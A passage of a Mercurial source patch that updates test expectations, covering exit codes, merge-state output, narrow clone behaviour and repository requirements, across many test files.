31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b @@ -277,7 +279,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19 @@ -285,7 +287,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998 @@ -888,7 +890,7 @@ $ mkdir $TESTTMP/lfs-server2 $ cd $TESTTMP/lfs-server2 #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -2001,6 +2001,26 @@ @@ -0,0 +1,1 @@ +b + +Test that diff.merge is respected (file b was added on one side and +and therefore merged cleanly) + + $ hg log -pr 3 --config diff.merge=yes + changeset: 3:8e07aafe1edc + tag: tip + parent: 2:b09be438c43a + parent: 1:925d80f479bb + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: 3 + + diff -r 8e07aafe1edc a + --- a/a Thu Jan 01 00:00:00 1970 +0000 + +++ b/a Thu Jan 01 00:00:00 1970 +0000 + @@ -1,1 +1,1 @@ + -b + +c + $ cd .. 'hg log -r rev fn' when last(filelog(fn)) != rev diff --git a/tests/test-mactext.t b/tests/test-mactext.t --- a/tests/test-mactext.t +++ b/tests/test-mactext.t @@ -27,7 +27,7 @@ transaction abort! rollback completed abort: pretxncommit.cr hook failed - [255] + [40] $ hg cat f | f --hexdump 0000: 68 65 6c 6c 6f 0a |hello.| diff --git a/tests/test-manifest.py b/tests/test-manifest.py --- a/tests/test-manifest.py +++ b/tests/test-manifest.py @@ -6,6 +6,8 @@ import unittest import zlib +from mercurial.node import sha1nodeconstants + from mercurial import ( manifest as manifestmod, match as matchmod, @@ -436,7 +438,7 @@ class testtreemanifest(unittest.TestCase, basemanifesttests): def parsemanifest(self, text): - return manifestmod.treemanifest(b'', text) + return manifestmod.treemanifest(sha1nodeconstants, b'', text) def testWalkSubtrees(self): m = self.parsemanifest(A_DEEPER_MANIFEST) diff --git a/tests/test-merge-changedelete.t b/tests/test-merge-changedelete.t --- a/tests/test-merge-changedelete.t +++ b/tests/test-merge-changedelete.t @@ -96,17 +96,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -163,17 +166,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -243,17 +249,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -307,17 +316,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -358,17 +370,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -405,17 +420,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -453,17 +471,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -512,17 +533,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -573,17 +597,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -631,17 +658,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -801,11 +831,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -840,11 +872,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -877,11 +911,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -916,11 +952,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -963,11 +1001,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -1011,11 +1051,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed diff --git a/tests/test-merge-criss-cross.t b/tests/test-merge-criss-cross.t --- a/tests/test-merge-criss-cross.t +++ b/tests/test-merge-criss-cross.t @@ -540,6 +540,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-deleting-the-file-from-deleted" $ hg manifest @@ -563,6 +564,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-deleting-the-file-from-updated" created new head $ hg manifest @@ -586,6 +588,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-keeping-the-file-from-deleted" created new head @@ -614,6 +617,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-keeping-the-file-from-updated" created new head $ hg manifest @@ -695,6 +699,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f @@ -763,6 +768,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e @@ -886,6 +892,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a @@ -923,6 +930,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a diff --git a/tests/test-merge-remove.t b/tests/test-merge-remove.t --- a/tests/test-merge-remove.t +++ b/tests/test-merge-remove.t @@ -95,7 +95,7 @@ $ hg merge bar: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat bar memories of buried pirate treasure diff --git a/tests/test-merge-subrepos.t b/tests/test-merge-subrepos.t --- a/tests/test-merge-subrepos.t +++ b/tests/test-merge-subrepos.t @@ -117,10 +117,17 @@ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved XXX: There's a difference between wdir() and '.', so there should be a status. -`hg files -S` from the top is also missing 'subrepo/b'. +`hg files -S` from the top is also missing 'subrepo/b'. The files should be +seen as deleted (and, maybe even missing? in which case `hg files` should list +it) $ hg st -S + R subrepo/b (missing-correct-output !) $ hg st -R subrepo + R subrepo/b (missing-correct-output !) + +(note: return [1] because no files "match" since the list is empty) + $ hg files -R subrepo [1] $ hg files -R subrepo -r '.' diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -377,7 +377,7 @@ merging f some fail message abort: $TESTTMP/mybrokenmerge.py hook failed - [255] + [40] $ aftermerge # cat f revision 1 @@ -1921,7 +1921,7 @@ Binary files capability checking $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x00\x01\x02\x03') > EOF @@ -1929,7 +1929,7 @@ $ hg commit -qm "add binary file (#1)" $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x03\x02\x01\x00') > EOF diff --git a/tests/test-merge1.t b/tests/test-merge1.t --- a/tests/test-merge1.t +++ b/tests/test-merge1.t @@ -113,7 +113,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] #if symlink symlinks to directories should be treated as regular files (issue5027) @@ -122,7 +122,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] symlinks shouldn't be followed $ rm b $ echo This is file b1 > .hg/b @@ -130,7 +130,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b $ echo This is file b2 > b @@ -144,7 +144,7 @@ $ hg merge 1 --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] this merge should warn $ hg merge 1 --config merge.checkunknown=warn @@ -188,7 +188,7 @@ $ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort remoteignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore merging .hgignore merging for .hgignore @@ -210,15 +210,15 @@ b: untracked file differs localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn b: replacing untracked file localignored: replacing untracked file diff --git a/tests/test-minirst.py b/tests/test-minirst.py --- a/tests/test-minirst.py +++ b/tests/test-minirst.py @@ -159,6 +159,8 @@ :a: First item. :ab: Second item. Indentation and wrapping is handled automatically. +:c\:d: a key with colon +:efg\:\:hh: a key with many colon Next list: diff --git a/tests/test-minirst.py.out b/tests/test-minirst.py.out --- a/tests/test-minirst.py.out +++ b/tests/test-minirst.py.out @@ -439,6 +439,8 @@ a First item. ab Second item. Indentation and wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many colon Next list: @@ -456,6 +458,9 @@ wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many + colon Next list: @@ -476,6 +481,10 @@ <dd>First item. <dt>ab <dd>Second item. Indentation and wrapping is handled automatically. + <dt>c:d + <dd>a key with colon + <dt>efg::hh + <dd>a key with many colon </dl> <p> Next list: diff --git a/tests/test-mq-qfold.t b/tests/test-mq-qfold.t --- a/tests/test-mq-qfold.t +++ b/tests/test-mq-qfold.t @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt original message diff --git a/tests/test-mq-qnew.t b/tests/test-mq-qnew.t --- a/tests/test-mq-qnew.t +++ b/tests/test-mq-qnew.t @@ -310,7 +310,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt diff --git a/tests/test-mq-qrefresh-replace-log-message.t b/tests/test-mq-qrefresh-replace-log-message.t --- a/tests/test-mq-qrefresh-replace-log-message.t +++ b/tests/test-mq-qrefresh-replace-log-message.t @@ -191,7 +191,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt Fifth commit message This is the 5th log message @@ -235,7 +235,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] (rebuilding at failure of qrefresh bases on rev #0, and it causes dropping status of "file2") @@ -273,7 +273,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== @@ -315,7 +315,7 @@ rollback completed qrefresh interrupted while patch was popped! (revert --all, qpush to recover) abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ sh "$TESTTMP/checkvisibility.sh" ==== diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,8 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -39,7 +39,7 @@ streaming all changes remote: abort: server does not support narrow stream clones abort: pull failed on remote - [255] + [100] Enable stream clone on the server @@ -68,6 +68,8 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,8 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,15 +64,17 @@ $ cd .. -BUG: local-to-local narrow clones should work, but don't. +local-to-local narrow clones work $ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10" requesting all changes - abort: server does not support narrow clones - [255] + adding changesets + adding manifests + adding file changes + added 3 changesets with 1 changes to 1 files + new changesets 5d21aaea77f8:26ce255d5b5d $ hg tracked -R narrow-via-localpeer - abort: repository narrow-via-localpeer not found - [255] + I path:dir/src/f10 $ rm -Rf narrow-via-localpeer narrow clone with a newline should fail diff --git a/tests/test-narrow-exchange.t b/tests/test-narrow-exchange.t --- a/tests/test-narrow-exchange.t +++ b/tests/test-narrow-exchange.t @@ -105,7 +105,7 @@ remote: adding file changes remote: transaction abort! remote: rollback completed - remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !) + remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !) remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !) abort: stream ended unexpectedly (got 0 bytes, expected 4) [255] @@ -218,8 +218,8 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !) - remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) remote: transaction abort! (lfs-on !) remote: rollback completed (lfs-on !) - remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !) diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -78,7 +78,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg id 223311e70a6f tip @@ -147,7 +147,8 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 + remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0 transaction abort! rollback completed abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-shallow-merges.t b/tests/test-narrow-shallow-merges.t --- a/tests/test-narrow-shallow-merges.t +++ b/tests/test-narrow-shallow-merges.t @@ -179,7 +179,7 @@ $ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort - ...2a20009de83e 000000000000 3ac1f5779de3 outside 10 + ...2a20009de83e 3ac1f5779de3 000000000000 outside 10 ...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9 ...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12 ...b844052e7b3b 000000000000 000000000000 outside 2c diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -110,9 +110,9 @@ requesting all changes remote: abort: depth must be positive, got 0 abort: pull failed on remote - [255] + [100] $ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1 requesting all changes remote: abort: depth must be positive, got -1 abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,8 @@ fncache generaldelta narrowhg-experimental + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-trackedcmd.t b/tests/test-narrow-trackedcmd.t --- a/tests/test-narrow-trackedcmd.t +++ b/tests/test-narrow-trackedcmd.t @@ -110,6 +110,8 @@ --clear whether to replace the existing narrowspec --force-delete-local-changes forces deletion of local changes when narrowing + --[no-]backup back up local changes when narrowing + (default: on) --update-working-copy update working copy when the store has changed -e --ssh CMD specify ssh command to use diff --git a/tests/test-narrow-widen.t b/tests/test-narrow-widen.t --- a/tests/test-narrow-widen.t +++ b/tests/test-narrow-widen.t @@ -431,7 +431,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ hg l $ hg bookmarks no bookmarks set diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -61,7 +61,7 @@ [255] Names with '.' in them are OK. - $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c + $ hg clone --narrow ./master should-work --include a/.b/c requesting all changes adding changesets adding manifests @@ -492,3 +492,33 @@ searching for changes looking for unused includes to remove found no unused includes +Test --no-backup + $ hg tracked --addinclude d0 --addinclude d2 -q + $ hg unbundle .hg/strip-backup/*-narrow.hg -q + $ rm .hg/strip-backup/* + $ hg tracked --auto-remove-includes --no-backup + comparing with ssh://user@dummy/master + searching for changes + looking for unused includes to remove + 